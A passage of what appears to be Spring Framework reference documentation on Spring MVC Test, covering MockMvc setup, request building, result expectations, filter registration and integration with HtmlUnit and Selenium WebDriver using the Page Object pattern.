WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe second is to simply create a controller instance manually without loading Spring\nconfiguration. Instead basic default configuration, roughly comparable to that of\nthe MVC JavaConfig or the MVC namespace, is automatically created and can be customized\nto a degree:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nWhich setup option should you use?\n\nThe __\"webAppContextSetup\"__ loads your actual Spring MVC configuration resulting in a\nmore complete integration test. Since the __TestContext framework__ caches the loaded\nSpring configuration, it helps keep tests running fast, even as you introduce more tests\nin your test suite. Furthermore, you can inject mock services into controllers through\nSpring configuration in order to remain focused on testing the web layer. Here is an\nexample of declaring a mock service with Mockito:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"org.mockito.Mockito\" factory-method=\"mock\">\n\t\t<constructor-arg value=\"org.example.AccountService\"\/>\n\t<\/bean>\n----\n\nYou can then inject the mock service into the test in order set up and verify\nexpectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class AccountTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Autowired\n\t\tprivate AccountService accountService;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nThe __\"standaloneSetup\"__ on the other hand is a little closer to a unit test. It tests\none controller at a time: the controller can be injected with mock dependencies manually,\nand it doesn't involve loading Spring configuration. Such tests are more focused on style\nand make it easier to see which controller is being tested, whether any specific Spring\nMVC configuration is required to work, and so on. The \"standaloneSetup\" is also a very\nconvenient way to write ad-hoc tests to verify specific behavior or to debug an issue.\n\nJust like with any \"integration vs. unit testing\" debate, there is no right or wrong\nanswer. However, using the \"standaloneSetup\" does imply the need for additional\n\"webAppContextSetup\" tests in order to verify your Spring MVC configuration.\nAlternatively, you may choose to write all tests with \"webAppContextSetup\" in order to\nalways test against your actual Spring MVC configuration.\n\n[[spring-mvc-test-server-performing-requests]]\n===== Performing Requests\nIt's easy to perform requests using any HTTP method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/hotels\/{id}\", 42).accept(MediaType.APPLICATION_JSON));\n----\n\nYou can also perform file upload requests that internally use\n`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart\nrequest but rather you have to set it up:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(fileUpload(\"\/doc\").file(\"a1\", \"ABC\".getBytes(\"UTF-8\")));\n----\n\nYou can specify query parameters in URI template style:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels?foo={foo}\", \"bar\"));\n----\n\nOr you can add Servlet request parameters representing either query of form parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/hotels\").param(\"foo\", \"bar\"));\n----\n\nIf application code relies on Servlet request parameters and doesn't check the query\nstring explicitly (as is most often the case) then it doesn't matter which option you use.\nKeep in mind however that query params provided with the URI template will be decoded while\nrequest parameters provided through the `param(...)` method are expected to already be decoded.\n\nIn most cases it's preferable to leave out the context path and the Servlet path from\nthe request URI. If you must test with the full request URI, be sure to set the\n`contextPath` and `servletPath` accordingly so that request mappings will work:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/app\/main\/hotels\/{id}\").contextPath(\"\/app\").servletPath(\"\/main\"))\n----\n\nLooking at the above example, it would be cumbersome to set the contextPath and\nservletPath with every performed request. Instead you can set up default request\nproperties:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tmockMvc = standaloneSetup(new AccountController())\n\t\t\t\t.defaultRequest(get(\"\/\")\n\t\t\t\t.contextPath(\"\/app\").servletPath(\"\/main\")\n\t\t\t\t.accept(MediaType.APPLICATION_JSON).build();\n\t\t}\n----\n\nThe above properties will affect every request performed through the `MockMvc` instance.\nIf the same property is also specified on a given request, it overrides the default value.\nThat is why the HTTP method and URI in the default request don't matter since they must be\nspecified on every request.\n\n[[spring-mvc-test-server-defining-expectations]]\n===== Defining Expectations\nExpectations can be defined by appending one or more `.andExpect(..)` calls after\nperforming a request:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/accounts\/1\")).andExpect(status().isOk());\n----\n\n`MockMvcResultMatchers.*` provides a number of expectations, some of which are further\nnested with more detailed expectations.\n\nExpectations fall in two general categories. The first category of assertions verifies\nproperties of the response: for example, the response status, headers, and content. These\nare the most important results to assert.\n\nThe second category of assertions goes beyond the response. These assertions allow\none to inspect Spring MVC specific aspects such as which controller method processed\nthe request, whether an exception was raised and handled, what the content of the model\nis, what view was selected, what flash attributes were added, and so on. They also allow\none to inspect Servlet specific aspects such as request and session attributes.\n\nThe following test asserts that binding or validation failed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nMany times when writing tests, it's useful to _dump_ the results of the performed request.\nThis can be done as follows, where `print()` is a static import from\n`MockMvcResultHandlers`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andDo(print())\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nAs long as request processing does not cause an unhandled exception, the `print()` method\nwill print all the available result data to `System.out`. Spring Framework 4.2 introduced\na `log()` method and two additional variants of the `print()` method, one that accepts\nan `OutputStream` and one that accepts a `Writer`. For example, invoking\n`print(System.err)` will print the result data to `System.err`; while invoking\n`print(myWriter)` will print the result data to a custom writer. If you would like to\nhave the result data _logged_ instead of printed, simply invoke the `log()` method which\nwill log the result data as a single `DEBUG` message under the\n`org.springframework.test.web.servlet.result` logging category.\n\nIn some cases, you may want to get direct access to the result and verify something that\ncannot be verified otherwise. This can be achieved by appending `.andReturn()` after all\nother expectations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMvcResult mvcResult = mockMvc.perform(post(\"\/persons\")).andExpect(status().isOk()).andReturn();\n\t\/\/ ...\n----\n\nIf all tests repeat the same expectations you can set up common expectations once\nwhen building the `MockMvc` instance:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tstandaloneSetup(new SimpleController())\n\t\t.alwaysExpect(status().isOk())\n\t\t.alwaysExpect(content().contentType(\"application\/json;charset=UTF-8\"))\n\t\t.build()\n----\n\nNote that common expectations are __always__ applied and cannot be overridden without\ncreating a separate `MockMvc` instance.\n\nWhen JSON response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using JsonPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/people\").accept(MediaType.APPLICATION_JSON))\n\t\t.andExpect(jsonPath(\"$.links[?(@.rel == 'self')].href\").value(\"http:\/\/localhost:8080\/people\"));\n----\n\nWhen XML response content contains hypermedia links created with\nhttps:\/\/github.com\/spring-projects\/spring-hateoas[Spring HATEOAS], the resulting links can\nbe verified using XPath expressions:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMap<String, String> ns = Collections.singletonMap(\"ns\", \"http:\/\/www.w3.org\/2005\/Atom\");\n\tmockMvc.perform(get(\"\/handle\").accept(MediaType.APPLICATION_XML))\n\t\t.andExpect(xpath(\"\/person\/ns:link[@rel='self']\/@href\", ns).string(\"http:\/\/localhost:8080\/people\"));\n----\n\n[[spring-mvc-test-server-filters]]\n===== Filter Registrations\nWhen setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();\n----\n\nRegistered filters will be invoked through via the `MockFilterChain` from `spring-test`, and the\nlast filter will delegate to the `DispatcherServlet`.\n\n[[spring-mvc-test-vs-end-to-end-integration-tests]]\n===== Differences between Out-of-Container and End-to-End Integration Tests\n\nAs mentioned earlier __Spring MVC Test__ is built on the Servlet API mock objects from\nthe `spring-test` module and does not use a running Servlet container. Therefore\nthere are some important differences compared to full end-to-end integration tests\nwith an actual client and server running.\n\nThe easiest way to think about this is starting with a blank `MockHttpServletRequest`.\nWhatever you add to it is what the request will be. Things that may catch you by surprise\nare that there is no context path by default, no `jsessionid` cookie, no forwarding, error,\nor async dispatches, and therefore no actual JSP rendering. Instead, \"forwarded\" and\n\"redirected\" URLs are saved in the `MockHttpServletResponse` and can be asserted with\nexpectations.\n\nThis means if you are using JSPs you can verify the JSP page to which the request was\nforwarded, but there won't be any HTML rendered. In other words, the JSP will not be\n_invoked_. Note however that all other rendering technologies which don't rely on\nforwarding such as Thymeleaf, Freemarker, and Velocity will render HTML to the response\nbody as expected. The same is true for rendering JSON, XML, and other formats via\n`@ResponseBody` methods.\n\nAlternatively you may consider the full end-to-end integration testing support from\nSpring Boot via `@WebIntegrationTest`. See the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].\n\nThere are pros and cons for each approach. The options provided in __Spring MVC Test__\nare different stops on the scale from classic unit testing to full integration testing.\nTo be certain, none of the options in Spring MVC Test fall under the category of classic\nunit testing, but they _are_ a little closer to it. For example, you can isolate the web\nlayer by injecting mocked services into controllers, in which case you're testing the web\nlayer only through the `DispatcherServlet` but with actual Spring configuration, just\nlike you might test the data access layer in isolation from the layers above. Or you\ncan use the standalone setup focusing on one controller at a time and manually providing\nthe configuration required to make it work.\n\nAnother important distinction when using __Spring MVC Test__ is that conceptually such\ntests are on the _inside_ of the server-side so you can check what handler was used,\nif an exception was handled with a HandlerExceptionResolver, what the content of the\nmodel is, what binding errors there were, etc. That means it's easier to write\nexpectations since the server is not a black box as it is when testing it through\nan actual HTTP client. This is generally an advantage of classic unit testing, that it's\neasier to write, reason about, and debug but does not replace the need for full\nintegration tests. At the same time it's important not to lose sight of the fact that\nthe response is the most important thing to check. In short, there is room here for\nmultiple styles and strategies of testing even within the same project.\n\n\n[[spring-mvc-test-server-resources]]\n===== Further Server-Side Test Examples\nThe framework's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples[many\nsample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples\nfor further ideas. Also the\nhttps:\/\/github.com\/spring-projects\/spring-mvc-showcase[spring-mvc-showcase] has full test\ncoverage based on Spring MVC Test.\n\n\n[[spring-mvc-test-server-htmlunit]]\n==== HtmlUnit Integration\n\nSpring provides integration between <<spring-mvc-test-server,MockMvc>> and\nhttp:\/\/htmlunit.sourceforge.net\/[HtmlUnit]. This simplifies performing end-to-end testing\nwhen using HTML based views. This integration enables developers to:\n\n* Easily test HTML pages using tools such as http:\/\/htmlunit.sourceforge.net\/[HtmlUnit],\nhttp:\/\/seleniumhq.org\/projects\/webdriver\/[WebDriver], &\nhttp:\/\/www.gebish.org\/manual\/current\/testing.html#spock_junit__testng[Geb] without the\nneed to deploy to a Servlet container\n* Test JavaScript within pages\n* Optionally test using mock services to speed up testing\n* Share logic between in-container end-to-end tests and out-of-container integration tests\n\n[NOTE]\n====\n`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,\nThymeleaf, Freemarker, Velocity, etc.), but it does not work with JSPs since they rely on\nthe Servlet Container.\n====\n\n[[spring-mvc-test-server-htmlunit-why]]\n===== Why HtmlUnit Integration?\n\nThe most obvious question that comes to mind is, \"Why do I need this?\". The answer is best\nfound by exploring a very basic sample application. Assume you have a Spring MVC web\napplication that supports CRUD operations on a `Message` object. The application also supports\npaging through all messages. How would you go about testing it?\n\nWith Spring MVC Test, we can easily test if we are able to create a `Message`.\n\n[source,java]\n----\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t.param(\"summary\", \"Spring Rocks\")\n\t.param(\"text\", \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t.andExpect(status().is3xxRedirection())\n\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nWhat if we want to test our form view that allows us to create the message? For example,\nassume our form looks like the following snippet:\n\n[source,xml]\n----\n<form id=\"messageForm\" action=\"\/messages\/\" method=\"post\">\n <div class=\"pull-right\"><a href=\"\/messages\/\">Messages<\/a><\/div>\n\n <label for=\"summary\">Summary<\/label>\n <input type=\"text\" class=\"required\" id=\"summary\" name=\"summary\" value=\"\" \/>\n\n <label for=\"text\">Message<\/label>\n <textarea id=\"text\" name=\"text\"><\/textarea>\n\n <div class=\"form-actions\">\n\t<input type=\"submit\" value=\"Create\" \/>\n <\/div>\n<\/form>\n----\n\nHow do we ensure that our form will produce the correct request to create a new message? A\nnaive attempt would look like this:\n\n[source,java]\n----\nmockMvc.perform(get(\"\/messages\/form\"))\n\t.andExpect(xpath(\"\/\/input[@name='summary']\").exists())\n\t.andExpect(xpath(\"\/\/textarea[@name='text']\").exists());\n----\n\nThis test has some obvious drawbacks. If we update our controller to use the parameter\n`message` instead of `text`, our form test would continue to pass even though the HTML\nform is out of synch with the controller. To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! Of course, this violates the _DRY Principle_; so\nwe should ideally extract this code into its own method as follows.\n\n[source,java]\n----\npublic HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {\n\tsetSummary(currentPage, summary);\n\t\/\/ ...\n}\n\npublic void setSummary(HtmlPage currentPage, String summary) {\n\tHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\n\tsummaryInput.setValueAttribute(summary);\n}\n----\n\nThis ensures that we do not have to update all of our tests if we change the UI.\n\nWe might even take this a step further and place this logic within an Object that\nrepresents the `HtmlPage` we are currently on.\n\n[source,java]\n----\npublic class CreateMessagePage {\n\n\tfinal HtmlPage currentPage;\n\n\tfinal HtmlTextInput summaryInput;\n\n\tfinal HtmlSubmitInput submit;\n\n\tpublic CreateMessagePage(HtmlPage currentPage) {\n\t\tthis.currentPage = currentPage;\n\t\tthis.summaryInput = currentPage.getHtmlElementById(\"summary\");\n\t\tthis.submit = currentPage.getHtmlElementById(\"submit\");\n\t}\n\n\tpublic <T> T createMessage(String summary, String text) throws Exception {\n\t\tsetSummary(summary);\n\n\t\tHtmlPage result = submit.click();\n\t\tboolean error = CreateMessagePage.at(result);\n\n\t\treturn (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));\n\t}\n\n\tpublic void setSummary(String summary) throws Exception {\n\t\tsummaryInput.setValueAttribute(summary);\n\t}\n\n\tpublic static boolean at(HtmlPage page) {\n\t\treturn \"Create Message\".equals(page.getTitleText());\n\t}\n}\n----\n\nFormerly, this pattern is known as the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageObjects[Page Object Pattern]. While we can\ncertainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the\nfollowing sections to make this pattern much easier to implement.\n\n[[spring-mvc-test-server-htmlunit-webdriver-setup]]\n====== MockMvc and WebDriver Setup\n\nTo use Selenium WebDriver with the Spring MVC Test framework, make sure that your project\nincludes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.\n\nWe can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the\n`MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-webdriver-usage]]\n====== MockMvc and WebDriver Usage\n\nNow we can use WebDriver as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttp:\/\/selenium.googlecode.com\/git\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory#Making_the_Example_Work_Using_Annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion 